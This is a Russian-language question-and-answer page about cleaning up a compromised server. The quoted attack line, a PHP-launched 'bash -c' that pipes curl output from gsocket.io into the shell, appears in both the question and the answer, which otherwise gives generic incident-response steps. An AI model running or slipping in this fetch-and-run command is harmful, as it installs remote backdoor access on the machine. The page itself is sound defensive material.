Вопрос или проблема
Сервер моего клиента был скомпрометирован. Они запускают этот скрипт с помощью PHP-скрипта
bash -c "$(curl -fsSL https://gsocket.io/x)"
и у меня есть несколько папок в /tmp, как ниже
-rw------- 1 *** *** 153310 30 Сен 12:07 phpb0wrlJ
-rw------- 1 *** *** 65536 29 Сен 13:50 phpc29KRO
-rw------- 1 *** *** 40960 30 Сен 12:43 phpdrvPac
-rw------- 1 *** *** 49152 29 Сен 14:30 phpOWdcZw
Это действительно подозрительно.
Я:
- Проверил наличие новых пользователей или несанкционированных изменений в файлах /etc/passwd и /etc/shadow.
- Проанализировал сетевые подключения с помощью команд netstat -tulnp или ss -tuln, ища незнакомые прослушивающие сервисы или соединения.
- Изучил запущенные процессы с помощью ps aux, чтобы определить подозрительные скрипты или бинарники.
- Просмотрел журналы в /var/log, особенно auth.log, syslog или messages, на предмет несанкционированных входов, использования sudo или другой необычной активности.
- Нашел незнакомые файлы в критических директориях, таких как /tmp, /var/tmp, /home, /etc, или любых бинарных директориях, таких как /usr/local/bin.
Мой вопрос: как удалить доступ gsocket с моего сервера?
Заранее спасибо.
Ответ или решение
Удаление доступа gsocket.io с сервера
Когда ваш сервер был скомпрометирован и обнаружены подозрительные скрипты, такие как команда, исполняемая из PHP-скрипта:
bash -c "$(curl -fsSL https://gsocket.io/x)"
это может свидетельствовать о наличии вредоносного ПО или удаленного доступа к вашему серверу. Ваша задача — эффективно удалить доступ gsocket.io и восстановить безопасность системы.
1. Оценка повреждения системы
Первый шаг к устранению угрозы — это полное понимание ситуации. Прежде всего, проведите анализ текущего состояния сервера:
-
Проверка файлов: Содержимое каталога
/tmp
с файлами, такими какphpb0wrlJ
,phpc29KRO
,phpdrvPac
, иphpOWdcZw
, указывает на возможное присутствие вредоносных скриптов. Все файлы в этом каталоге нужно удалить:rm -rf /tmp/php*
-
Просмотр сетевых подключений: Выполните команду для проверки активных соединений и прослушивающих сервисов:
netstat -tulnp
Если вы обнаружите какие-либо подозрительные подключения, вам нужно будет выяснить, какие процессы их используют и при необходимости завершить их:
kill -9 [PID]
2. Удаление вредоносного ПО
Чтобы окончательно удалить доступ gsocket.io:
-
Отключите вредоносные процессы: Используйте
ps aux
для поиска подозрительных процессов, связанных с gsocket.io. Убедитесь, что все процессы, такие какgsocket
, завершены. -
Очистка настроек конфигурации: Проверьте файлы конфигурации, такие как
.bashrc
,.bash_profile
, и подобные, чтобы убедиться, что в них нет ссылок или команд, которые могут восстанавливать доступ к gsocket.io. -
Смена паролей: Измените все пароли к учетным записям пользователей, особенно к тем, которые имеют права root или sudo. Это необходимо для предотвращения повторного доступа злоумышленников.
3. Устранение уязвимости
После удаления доступа необходимо убедиться, что сервер защищен от повторных атак:
-
Обновление ПО: Убедитесь, что операционная система и все установленные пакеты обновлены до последних версий. Обновления часто содержат исправления известных уязвимостей.
-
Настройка брандмауэра: Используйте
iptables
илиufw
для настройки брандмауэра и ограничения входящих подключений только к необходимым портам. -
Мониторинг системы: Установите средства мониторинга и алертинга для отслеживания необычных действий. Это может быть как использование простых скриптов, так и специализированные инструменты, такие как OSSEC или Fail2ban.
4. Окончательная проверка
После выполнения всех вышеуказанных шагов выполните полное сканирование системы:
-
Антивирусная проверка: Запустите антивирусные утилиты, чтобы убедиться, что нет оставшегося вредоносного ПО на сервере.
-
Аудит безопасности: Проведите аудит безопасности всей системы, проверив конфигурацию служб и удалив неиспользуемые.
Заключение
Убедитесь, что ваша команда ознакомлена с безопасными практиками и не выполняет потенциально небезопасные команды на сервере без должного анализа. Помните, контроль за безопасностью должен быть постоянным процессом, включающим обновления, мониторинг и готовность к реагированию на инциденты. Если у вас нет уверенности в возможностях восстановления безопасности самостоятельно, рекомендуется привлечь специалистов в области кибербезопасности.